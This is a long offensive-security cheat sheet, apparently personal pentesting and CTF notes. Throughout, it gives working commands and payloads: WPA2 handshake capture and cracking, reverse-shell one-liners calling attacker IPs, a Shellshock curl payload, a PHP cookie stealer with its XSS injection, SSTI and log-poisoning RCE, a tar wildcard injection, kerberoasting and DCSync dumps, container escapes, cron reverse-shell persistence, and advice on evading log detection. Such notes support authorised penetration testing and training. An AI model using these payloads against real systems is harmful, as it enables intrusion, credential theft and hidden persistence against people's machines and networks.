To start WPA2 cracking, make sure your wireless interface is in monitor mode. Either set it by hand:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
or let airmon-ng do it (check kill stops processes such as NetworkManager that would interfere; recent versions create a new interface called wlan0mon, so use that name in the following commands):
airmon-ng check kill
airmon-ng start wlan0
To list nearby access points (APs) with their channel, BSSID and connected clients:
airodump-ng wlan0
To capture traffic for a specific AP, pass its channel with -c and its MAC address with --bssid:
airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS wlan0
To capture the 4-way handshake, run the same command with -w so the capture is written to a file (airodump-ng shows "WPA handshake: <bssid>" in its top right corner once it has one):
airodump-ng -c CHANNEL_NUMBER --bssid MAC_ADDRESS -w FILENAME wlan0
Keep this running and launch a deauthentication attack against a specific client of the AP (-0 0 keeps sending deauth frames until interrupted; leave out -c to deauth every client of the AP):
aireplay-ng -0 0 -a MAC_ADDRESS -c CLIENT_MAC wlan0
When the client reconnects, airodump-ng captures the handshake. To crack the pre-shared key from the capture (airodump-ng names it FILENAME-01.cap), use aircrack-ng with a wordlist:
aircrack-ng FILENAME-01.cap -w /path/to/wordlist
Once the password is cracked, put the interface back into managed mode (airmon-ng stop wlan0mon) and restart NetworkManager:
sudo systemctl restart NetworkManager.service
Upgrade a dumb reverse shell to a fully interactive TTY (after spawning a pty, see below):
- ctrl+z
- stty raw -echo
- fg (press enter x2)
- export TERM=xterm (so that commands like clear work)
Host discovery on the local network:
netdiscover -i <interface>
arp-scan -l
fping -a -g <ip>/24
nmap -n -sn <ip>/24   (ping sweep; -sP is the old name of -sn)
for i in $(seq 1 254); do ping -c 1 -W 1 192.168.168.$i | grep "bytes from"; done   (-W 1 is a 1 second timeout; -t would set the TTL instead)
Spawn a pty from a dumb shell:
- /usr/bin/script -qc /bin/bash /dev/null
- python -c 'import pty;pty.spawn("/bin/bash")'
- python3 -c 'import pty;pty.spawn("/bin/bash")'
If sudo (older than 1.8.28, CVE-2019-14287) allows running a command as any user except root, e.g. (ALL, !root), the user id -1 is accepted and resolves to root:
sudo -u#-1 whoami
sudo -u#-1 <path_of_executable_as_other_user>
Otherwise run a command as a user you are allowed to impersonate:
sudo -u <user> <command>
Connect to FTP on the machine (the client prompts for the user name and password):
ftp <ip>
After logging in, turn off the per-file confirmation and download all files in the current directory:
prompt off
mget *
Download files recursively instead (from the attacker's side, with known credentials):
wget -r ftp://user:pass@<ip>/
smbclient -L \\\\<ip>\\ -N                   (list all shares, anonymously)
smbclient \\\\<ip>\\<share> -N               (access a share anonymously)
smbclient \\\\<ip>\\<share> -U <user>        (access a share as an authorized user)
smbmap -u <username> -p <password> -H <ip>   (list shares and our permissions on them)
smbget -R smb://<ip>/<share>                 (download a share recursively)
showmount -e <ip>                                            (list the NFS exports)
mount -t nfs <ip>:/<share_name> <directory_where_to_mount>   (mount that export)
- Per-user crontabs are stored in /var/spool/cron/crontabs/ (Debian/Ubuntu)
crontab -u <user> -l   (list the cronjobs of a specific user; -e edits them)
crontab -l             (cronjobs of the current user)
cat /etc/crontab       (system-wide cronjobs; also look in /etc/cron.d/ and /etc/cron.{hourly,daily,weekly}/)
- find / -perm -4000 -type f 2>/dev/null   (SUID binaries: run with the file owner's uid)
- find / -perm -2000 -type f 2>/dev/null   (SGID binaries: run with the file group's gid)
getcap -r / 2>/dev/null
grep -rnw '/path/to/somewhere/' -e 'pattern'
chattr +i filename   (make the file immutable; lsattr shows the i flag)
chattr -i filename   (make the file mutable again)
lsattr filename      (check file attributes)
scp /file/you/want user@<ip>:/path/to/store
python -m SimpleHTTPServer [port] By default will listen on 8000
python3 -m http.server [port] By default will listen on 8000
wget http://<ip>:port/<file>
#!/bin/bash
# Fetch a file over plain HTTP using only bash's /dev/tcp, for targets that
# have neither wget nor curl. Usage: download http://<ip>:<port>/<file> > <file>
download() {
    read proto server path <<< "${1//"/"/ }"   # split the URL on "/"
    DOC=/${path// //}                           # rebuild the request path
    HOST=${server//:*}                          # host part (before ":")
    PORT=${server//*:}                          # port part (after ":")
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80   # no port in the URL: default to 80
    exec 3<>/dev/tcp/${HOST}/$PORT
    # send request
    echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
    # read the header, it ends in an empty line (just CRLF)
    while IFS= read -r line ; do
        [[ "$line" == $'\r' ]] && break
    done <&3
    # read the body; NUL-delimited reads keep binary data intact
    nul='\0'
    while IFS= read -d '' -r x || { nul=""; [ -n "$x" ]; }; do
        printf "%s$nul" "$x"
    done <&3
    exec 3>&-
}
nc -l -p [port] > file       (receive a file)
nc -w 3 [ip] [port] < file   (send a file)
fcrackzip -u -D -p <path_to_wordlist> <archive.zip>
If you have an .asc PGP/GPG private key (e.g. one needed to decrypt .pgp files) protected by a passphrase, crack the passphrase with john and then use the key:
- gpg2john key.asc > asc_hash
- john asc_hash --wordlist=path_to_wordlist
- gpg --import key.asc
- gpg --decrypt file.pgp
To stop a background job, find its job number with jobs and kill it by %<number>:
$ jobs
[1]+ Running sleep 100 &
$ kill %1
[1]+ Terminated sleep 100
Local port forwarding over SSH (reach a port on the target that is bound to localhost or filtered):
ssh -L <local_port>:localhost:<target_port> <username>@<ip>
Dynamic (SOCKS) proxy over SSH, usable with proxychains:
ssh username@ip -i id_rsa(optional) -D 1337
Reverse port forwarding with chisel when SSH is not an option:
On attacker machine: ./chisel_1.7.6_linux_amd64 server -p <port to listen> --reverse
On target machine: ./chisel client <attacker>:<attacker_listening_port> R:localhost:<port to forward from target>
Log poisoning through SSH: log in as any user and confirm the attempt shows up in a log you can read through the LFI (e.g. /var/log/auth.log), then log in again with PHP code as the user name so it gets written into the log:
ssh "<?php system(\$_GET['a']); ?>"@192.168.43.2
Then include the log file through the page's LFI parameter and pass the command:
http://ip/page?<lfi_parameter>=/var/log/auth.log&a=whoami
If we are allowed to run /usr/bin/ln as root through sudo, we can own the machine: write a script, replace the ln binary with a symlink to it and run "ln" through sudo again
echo 'bash' > /tmp/root
chmod +x /tmp/root
sudo /usr/bin/ln -sf /tmp/root /usr/bin/ln
sudo /usr/bin/ln
From inside vi/vim (e.g. the editor of a restricted shell, or one allowed through sudo) escape to a shell with
:set shell=/bin/sh
:shell
Then fix the PATH variable in the new shell:
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
When logging in over SSH we can use -t to force pseudo-tty allocation, and in that session change the PATH and SHELL variables (useful against restricted shells).
Whenever you see a cronjob running something like cd /home/<user>/backup && tar -zcf /<folder>/file.tar.gz * (the shell expands the wildcard inside that directory, and tar runs as the cron user, usually root)
go to the directory being backed up and create these files there: the script tar will execute, and two empty files whose names GNU tar parses as options
echo "mkfifo /tmp/lhennp; nc 10.2.54.209 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
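The whole injection reproduced locally, as an added example that is not part of the original notes: it seeds a throwaway directory with the three attacker files, runs the cron job's tar command there and checks whether the injected command executed. It assumes GNU tar (--checkpoint is a GNU extension) and uses a marker file in place of the reverse shell.

```shell
# Added example (not from the original notes): reproduce the tar wildcard
# injection locally to see why those two file names matter. Assumes GNU tar;
# a marker file stands in for the reverse shell.

# Simulates the victim cron job "cd <dir> && tar -zcf <archive> *" in a
# throwaway directory seeded with the attacker's files. Returns 0 when the
# injected command ran, 1 otherwise.
tar_wildcard_demo() {
    work=$(mktemp -d) || return 1
    marker="$work/pwned.txt"
    mkdir "$work/backup"
    (
        cd "$work/backup" || exit 1
        echo "hello" > notes.txt                         # a legitimate file being backed up
        # shell.sh is what tar will execute; a real attack puts the reverse shell here
        printf 'id -un > "%s"\n' "$marker" > shell.sh
        # empty files whose names GNU tar parses as options once the shell expands "*"
        echo "" > "--checkpoint-action=exec=sh shell.sh"
        echo "" > --checkpoint=1
        # the victim side: exactly what the cron job runs (the archive is still created)
        tar -zcf "$work/backup.tgz" * >/dev/null 2>&1 || true
    )
    if [ -f "$marker" ]; then
        printf 'injected command ran as: %s\n' "$(cat "$marker")"
        rm -rf "$work"
        return 0
    fi
    rm -rf "$work"
    return 1
}

tar_wildcard_demo
```

The archive is written normally, so nothing looks broken on the victim's side. The defensive fix is to stop file names from becoming options: tar -zcf archive.tgz -- * or naming the directory instead of using *.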
If a binary (e.g. one run by cron or with SUID) calls another command by its bare name, for example date, we can create our own "date" containing /bin/bash and prepend its directory to PATH so ours gets executed first
export PATH=<path_where_binary_is>/:$PATH
If port 5900 or 5901 is open it is likely VNC; a file named .remote_secret or .secret is probably the VNC password file (obfuscated with a fixed DES key, so it can be recovered)
vncviewer -passwd remote_secret <ip>::<port>
We can also decrypt the VNC password with https://github.com/jeroennijhof/vncpwd
./vncpwd remote_secret
- cat /etc/*release
- cat /etc/issue
- uname -a
- lsb_release -a
- Running Linpeas
- ss -tulpn (for ports that are open on the machine)
- netstat -tulpn
- ps -ef --forest
net user "USER_NAME" "PASS" /add                 (create a local user)
net user "USER_NAME" "NEWPASS"                   (change a user's password)
net localgroup administrators "USER_NAME" /add   (add the user to the local Administrators group)
cacls files /e /p {USERNAME}:{PERMISSION}        (edit the file's ACL; icacls is the current replacement)
Permissions:
1.R Read
2.W Write
3.C Change
4.F Full Control
attrib +r filename add read only bit
attrib -r filename remove read only bit
attrib +h filename add hidden bit
attrib -h filename remove hidden bit
Show hidden file/folder
dir /a show all hidden files & folder
dir /a:d show only hidden folder
dir /a:h show only hidden files
certutil.exe -urlcache -f http://<ip>:<port>/<file> output.exe
powershell -c "wget http://<ip>:<port>/<file> -OutFile output.exe"
powershell Invoke-WebRequest -Uri $ip -OutFile $filepath
- Run winPEAS.exe on the machine
- Run PowerUp.ps1 (https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc, documentation: https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/):
. .\PowerUp.ps1
Invoke-AllChecks
If both of these queries show AlwaysInstallElevated set to 0x1 (both the machine and the user policy must be set), any .msi package is installed as SYSTEM
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
To exploit this generate a Windows MSI payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi > shell.msi
Start a netcat listener, transfer the file and run it on the target machine
msiexec /quiet /qn /i shell.msi
Alternatively this can be done with metasploit's local exploit module
exploit/windows/local/always_install_elevated
wmic logicaldisk get caption
Recover a credential stored with Export-Clixml (a serialized PSCredential, only readable by the same user on the same machine):
- $file = Import-Clixml -Path <path_to_file>
- $file.GetNetworkCredential().username
- $file.GetNetworkCredential().password
evil-winrm -i 10.10.213.169 -u <USER> -p '<PASS>'
python psexec.py DOMAIN/USER:PASS@IP
Forced authentication (make the target connect to us so we capture its NTLM hash): https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication
crackmapexec smb <IP> -u 'Anonymous' -p '' --rid-brute   (enumerate domain users by RID cycling over a null/guest session)
If SeImpersonatePrivilege is enabled (check with whoami /priv), upload PrintSpoofer.exe to a directory we can write to and run
PrintSpoofer.exe -i -c powershell.exe
If the system has PsExec.exe, from an elevated cmd we can get a SYSTEM shell with
.\PsExec.exe -i -s cmd.exe
If we can upload files to a share that users browse, we can upload an SCF (Shell Command File) whose icon points at our share; when Explorer renders the folder it fetches the icon and authenticates to our share with the user's credentials
[Shell]
Command=2
IconFile=\\IP\share\test.ico
[Taskbar]
Command=ToggleDesktop
Then launch Responder on the interface facing the target to capture the NTLMv2 hash
responder -I tun0
powershell -ep bypass   (start PowerShell with the execution policy bypassed)
. .\PowerView.ps1       (import the PowerView module)
windapsearch -d 'domain.local' --dc IP -m users
python3 bloodhound.py -d 'DOMAIN_NAME' -u 'VALID_USERNAME' -p 'VALID_PASSWORD' -gc 'HOSTNAME.DOMAIN' -c all -ns IP
Import the resulting json files in the BloodHound GUI
- Or upload SharpHound.ps1 (https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) to the target and run
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain DOMAIN-NAME -ZipFileName loot.zip
The domain name can be found by running Get-ADDomain and reading the result
If BloodHound shows a kerberoastable service account (a user with an SPN), request its TGS hash with this impacket script
python3 GetUserSPNs.py DOMAIN/USERNAME:PASSWORD -dc-ip IP -request
(GetNPUsers.py is the related script for AS-REP roasting: accounts that do not require Kerberos pre-authentication)
- Download Rubeus: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe
- Documentation: https://github.com/GhostPack/Rubeus
- Transfer Rubeus.exe to the target Windows machine and run
.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt
to get the hash
If we find a user with DCSync rights (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights, shown as GetChanges/GetChangesAll in BloodHound), i.e. the ability to replicate AD secrets like a domain controller does, we can dump the NTDS.dit hashes remotely
python3 secretsdump.py 'DOMAIN/USERNAME':'PASSWORD'@IP -just-dc-ntlm
https://cheatsheet.haax.fr/windows-systems/privilege-escalation/delegations/
https://github.com/dirkjanm/krbrelayx
- Custom binaries usually go in /usr/local/bin
- Reverse shell one-liner for a nc without -e:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> > /tmp/f
msfvenom -l payloads
msfvenom --list formats
run getgui -u [USER_NAME] -p [PASS]   (meterpreter: enable RDP and add a user)
Pivoting: add a route through an existing session, for example when the compromised host has IP 172.18.0.1
use post/multi/manage/autoroute
set SUBNET 172.18.0.0
set SESSION <session_number>
run
Then start a SOCKS proxy that uses those routes
use auxiliary/server/socks_proxy
set VERSION 4a
run
The proxy listens on SRVPORT (1080 by default, change it if needed) and proxychains is pointed at it in /etc/proxychains.conf (socks4 127.0.0.1 1080)
Scan the internal subnet through the session
use auxiliary/scanner/portscan/tcp
set RHOSTS <subnet>/24
Or forward a single port from a meterpreter session
portfwd add -l <port_to_listen> -p <port_to_be_open> -r <targeted_ip>
MSSQL: with valid credentials auxiliary/admin/mssql/mssql_exec executes commands through xp_cmdshell, or do it by hand with sqsh
sqsh -S IP -U <username> -P <password>
then EXEC master..xp_cmdshell 'whoami' followed by go
./gitdumper.sh <url_of_the_exposed_.git_directory> <destination_folder>   (GitTools: download an exposed .git directory)
./extractor.sh <folder_containing_.git> <extract_to_a_folder>              (rebuild the commits into readable files)
If you come across a php file, look for a backup such as config.php.bak as well
https://github.com/intrudir/403fuzzer
python3 403fuzzer.py -hc 403 -u http://<ip>/<page_that_returns_403>   (tries header and path tricks to bypass a 403 Forbidden)
If a cgi-bin directory exists on the web server, fuzz for scripts inside it; if one is handled by a vulnerable bash, the Shellshock vulnerability (CVE-2014-6271) lets us run commands on the server by putting a crafted function definition in a header such as User-Agent
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/IP/PORT 0>&1' http://<remote_ip>/cgi-bin/file
or with metasploit: use exploit/multi/http/apache_mod_cgi_bash_env_exec
Interactive JavaScript shell through XSS (the victim's browser keeps fetching a script from the attacker, who types the code to run):
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
With an LFI, try to read local files such as log files, the Apache virtual host configuration and the application's source code on the target
Virtual hosts file: /etc/apache2/sites-available/000-default.conf
If we can read log files, we can poison them to get RCE
For Apache: /var/log/apache2/access.log
Try to include the log; if that works, send a request with <?php system($_GET['c']); ?> as the User-Agent and include the log again with &c=<command>
For nginx: /var/log/nginx/error.log
Same procedure: put <?php system($_GET['c']); ?> in the User-Agent, or in another request parameter that ends up in the log; make sure the payload is not URL-encoded when it is written
To check for SSTI, send {{7*7}} in a parameter or in the path, e.g. http://IP/{{4*4}}: if the response contains 49 (or 16) the input is evaluated by a template engine. To tell engines apart use test{{7*'7'}}: Jinja2 (Python) returns 7777777 because it repeats the string, while Twig (PHP) returns 49
Jinja2 exploits
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
References
- https://chowdera.com/2020/12/20201221231521371q.html
- https://www.fatalerrors.org/a/0dhx1Dk.html
- https://hackmd.io/@Chivato/HyWsJ31dI
Host this php file (cookie.php) on your machine; it sends the victim on to a harmless page and appends the decoded cookie to log.txt
<?php
// redirect the victim so nothing looks off
header('Location: http://domain');
if (isset($_GET["c"])) {
    // $_GET is already URL-decoded; decoding again would turn "+" into a space and corrupt the base64
    $cookies = base64_decode($_GET["c"]);
    $file = fopen('log.txt', 'a');
    fwrite($file, $cookies . "\n\n");
    fclose($file);
}
?>
Inject this where the web application is vulnerable to XSS (the cookie is base64- and URL-encoded before being sent)
<script>document.location='http://<ip>/cookie.php?c='+encodeURIComponent(btoa(document.cookie));</script>
Alternatively use this
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
sqlmap -r request.txt --dbms=mysql --dump   (request.txt is the raw request saved from Burp)
wfuzz -c -z file,wordlist.txt --hh=0 http://<ip>/<path>/?date=FUZZ   (--hh=0 hides responses with 0 characters)
To use two payloads in the same request
wfuzz -c -w /path/to/first/wordlist -w /path/to/second/wordlist -u http://ip/FUZZ/FUZ2Z
FUZ2Z is replaced from the second wordlist; this works up to FUZnZ (n being the position of the wordlist on the command line)
- If there is an older API version (e.g. v1 next to v2), check it too: it is a likely candidate for LFI
- Use wfuzz to fuzz for API endpoints or parameter names
wfuzz -u http://<ip>:<port>/<api-endpoint>\?FUZZ\=.bash_history -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404
Here <api-endpoint> can be for example /api/v1/resources/books, so the request becomes /api/v1/resources/books?FUZZ=.bash_history
"?" starts the query string, FUZZ is the parameter name being guessed and .bash_history is the file we try to read through it, as an example
bash -c "<bash_rev_shell>"
Using wpscan we can enumerate users, plugins and the WordPress version
wpscan --url http://<ip>/wordpress -e u                                     (enumerate users)
wpscan --url http://<ip>/wordpress -e ap --plugins-detection aggressive   (enumerate all plugins)
To bruteforce passwords
wpscan --url <ip> -U user_file_path -P password_file_path
After logging into the WordPress dashboard, we can edit the active theme's 404.php with a PHP reverse shell to get RCE:
- Go to Appearance -> Editor, select the 404.php template of the current theme and paste the PHP reverse shell
- Then navigate to http://<ip>/wp-content/themes/<theme>/404.php (e.g. twentyfifteen or twentytwenty, whichever theme is active; the path may also sit under /wordpress/)
Prototype pollution to RCE in a Node.js application that merges request JSON into objects and renders with Pug: the polluted "block" is picked up by the Pug compiler and its line is evaluated as JavaScript
{
  "key": "value",
  "__proto__.block": {
    "type": "Text",
    "line": "test;return process.mainModule.constructor._load('fs').readdirSync('./', {encoding:'utf8', flag:'r'})",
    "val": "THIS IS THE VALUE"
  }
}
If we have access to Tomcat's /manager/html, we can deploy a WAR payload (arz.war) and reach it at http://ip/arz
If nginx is used as a reverse proxy in front of Apache Tomcat, we can abuse it through path traversal via reverse proxy mapping (Tomcat treats ";" as a path parameter, so a request containing ..;/ can reach paths such as /manager that the proxy does not expose)
https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/
Directory wordlists:
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
gobuster dir -u http://<ip>/ -w <path_to_wordlist>
gobuster dir -u http://<ip>/ -w <path_to_wordlist> -s "204,301,302,307,401,403" -b ""
(use a status code whitelist if the web server answers 200 to every GET request; recent gobuster versions require clearing the default blacklist with -b "" when -s is given)
feroxbuster -u http://<ip>/ -w <path_to_wordlist>
python3 dirsearch.py -u http://<ip>/ -w <path_to_wordlist>
Password wordlists:
- /usr/share/wordlists/rockyou.txt
- /usr/share/wordlists/fasttrack.txt
- crackstation (https://crackstation.net/, lookup tables for unsalted hashes)
- seclists (/usr/share/seclists)
Hydra against a login form that shows an error message on failure (F= is the failure string):
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USER^&password=^PASS^:F=Incorrect!' -t 64 -V -I
When the form doesn't show an error message, specify a success string instead (S=): something shown only after logging in, typically "logout"
hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form '/login.php:username=^USER^&password=^PASS^:S=logout' -t 64 -V -I
- If you have a salted hash and you know the salt, give it to hashcat as hash:salt, with the mode matching how the salt is applied (e.g. -m 10 for md5($pass.$salt), -m 20 for md5($salt.$pass))
cewl spiders the given URL, collects the words it finds and builds a wordlist from them
cewl <url> -w wordlist.txt
To generate a password list of length 7 starting with "milo" and ending in a 3 digit number, use crunch's -t pattern: % stands for a digit, @ for a lowercase letter, , for an uppercase letter and ^ for a special character
crunch 7 7 0123456789 -t milo%%% -o password.txt
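The two notes above (the hash:salt layout and the crunch mask) joined into one runnable script, as an added example that is not part of the original notes: the "milo%%%" mask is expanded by hand and each candidate is checked against an md5 with a known salt, appended or prepended as hashcat modes 10 and 20 do. It assumes md5sum from coreutils; the salt, password and target hash are constructed for the demo, and only the % (digit) class of the crunch pattern language is implemented.

```shell
# Added example (not from the original notes): the crunch mask "milo%%%" expanded
# by hand and fed to a salted-hash check, i.e. what "hash:salt" cracking does when
# the salt is known. Assumes md5sum from coreutils; the salt, password and hash
# below are constructed for the demo, and only the % (digit) class of the crunch
# pattern language is implemented.
DEMO_SALT="s4lt"
DEMO_HASH=$(printf 'milo742%s' "$DEMO_SALT" | md5sum | cut -d' ' -f1)   # md5("milo742" + "s4lt")

# mask_candidates <prefix>: print every word for the mask "<prefix>%%%"
# (prefix followed by three digits), 1000 candidates in order.
mask_candidates() {
    prefix=$1
    i=0
    while [ "$i" -le 999 ]; do
        printf '%s%03d\n' "$prefix" "$i"
        i=$((i + 1))
    done
}

# crack_salted_md5 <hash> <salt> [suffix|prefix]: reads candidates on stdin,
# hashes md5(pw+salt) (hashcat -m 10) or md5(salt+pw) (hashcat -m 20) and prints
# the first candidate that matches. Returns 1 when the list is exhausted.
crack_salted_md5() {
    target=$1
    salt=$2
    where=${3:-suffix}
    while IFS= read -r pw; do
        if [ "$where" = prefix ]; then data="$salt$pw"; else data="$pw$salt"; fi
        h=$(printf '%s' "$data" | md5sum | cut -d' ' -f1)
        if [ "$h" = "$target" ]; then
            printf '%s\n' "$pw"
            return 0
        fi
    done
    return 1
}

mask_candidates milo | crack_salted_md5 "$DEMO_HASH" "$DEMO_SALT"   # prints milo742
```

Getting the salt position wrong silently exhausts the list, which is why the hashcat mode has to match how the application builds the hash; with the real crunch output, replace mask_candidates with cat password.txt.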
Virtual host fuzzing (add --hh or --hw to hide the default response size):
wfuzz -c -w <path_to_wordlist> -u http://<ip> -H "Host: FUZZ.domain.com"
If port 53 is open on the machine, try a zone transfer to get all DNS records of the domain
dig axfr @<ip> <domain_name>
- strace: trace / tamper with processes
- gdb: C/C++ debugger
- script: records terminal activity
- w / who: check the current pts (terminal devices) of logged-in users
- ps -t pts/<number>: processes running on that terminal
- script /dev/pts/<number>: monitor a terminal
- cat /dev/urandom > /dev/pts/<number> 2>/dev/null: prints arbitrary text on that terminal
- pkill -9 -t pts/<number>: kill every process on that terminal
- Add this to root's crontab (crontab -e) for a reverse shell every minute
*/1 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
Or add it to the system-wide crontab (nano /etc/crontab), which needs the extra user field
*/1 * * * * root /bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/2222 0>&1'
nano /etc/ssh/sshd_config
(change Port 22 to any port you want; other settings in the file can be tinkered with too)
service sshd restart
(restart the SSH service to apply the changes)
ssh user@ip -T
(-T disables pseudo-tty allocation; the session has limitations, e.g. bash and other interactive programs do not work properly, but it is useful because no pts is allocated, so the session is not listed by w/who)
while [ 1 ]; do /root/chattr -i king.txt; done &   (keep clearing the immutable flag on the file in the background)
- echo "msg" > /dev/pts/<number>: send a message to a specific user's terminal
- wall msg: broadcast a message to everyone
- quser: list logged-on users (Windows)
- logoff <id|user_name>: log a user off (Windows)
ldapsearch -x -LLL -h localhost -D 'cn=USER,ou=users,dc=domain,dc=com' -w PASSWORD -b "dc=domain,dc=com"
11.11. Covering our Tracks
The final stages of penetration testing involve setting up persistence and covering our tracks. For today's material, we'll detail the latter as this is not mentioned nearly enough.
During a pentesting engagement, you will want to avoid detection by the administrators and engineers of your client wherever the permitted scope allows. Activities such as logging in, authentication and uploading/downloading files are logged by services and by the system itself.
On Debian and Ubuntu, the majority of these logs live under /var/log and often require administrative privileges to read and modify. Some log files of interest:
/var/log/auth.log (attempted logins for SSH, changes to or logging in as system users)
/var/log/syslog (system events such as firewall alerts)
/var/log/<service>/
For example, the access logs of apache2:
/var/log/apache2/access.log
If the Docker daemon is exposed on tcp/2375 (unauthenticated remote API):
docker -H <ip>:2375 images                             (list the images on the remote machine)
docker -H <ip>:2375 ps -a                              (list all containers, running or stopped)
docker -H <ip>:2375 exec -it <container-id> /bin/sh    (get a shell in a running container)
docker -H <ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh   (start a new container by image name and tag with the host's filesystem mounted, and chroot into it)
Break out onto the host through the remote API with an image that already exists there
docker -H tcp://<ip>:2375 run --rm -it -v /:/host <image_name> chroot /host bash
If docker.sock is mounted inside the container, upload a static docker binary and use the socket the same way
./docker -H unix:///var/run/docker.sock images
./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host
- If the container is privileged (--privileged) and fdisk -l shows the host's disks, we can mount the host file system directly
mount /dev/sda<x> /mnt/host
- Check the container's capabilities with capsh --print; CAP_SYS_MODULE, for example, allows loading a kernel module into the host kernel
- There is also the runc breakout CVE-2019-5736 (a malicious container overwrites the host's runc binary the next time someone runs docker exec into it)
https://github.com/Frichetten/CVE-2019-5736-PoC
Kubernetes enumeration (from inside a pod with a service account token, or with a kubeconfig):
kubectl get pods
kubectl get namespaces
kubectl get pods -n <namespace>
kubectl get secrets -n kube-system
kubectl describe secret <secret_name> -n <namespace_name>
kubectl get -o json pod <pod_name> -n <namespace_name>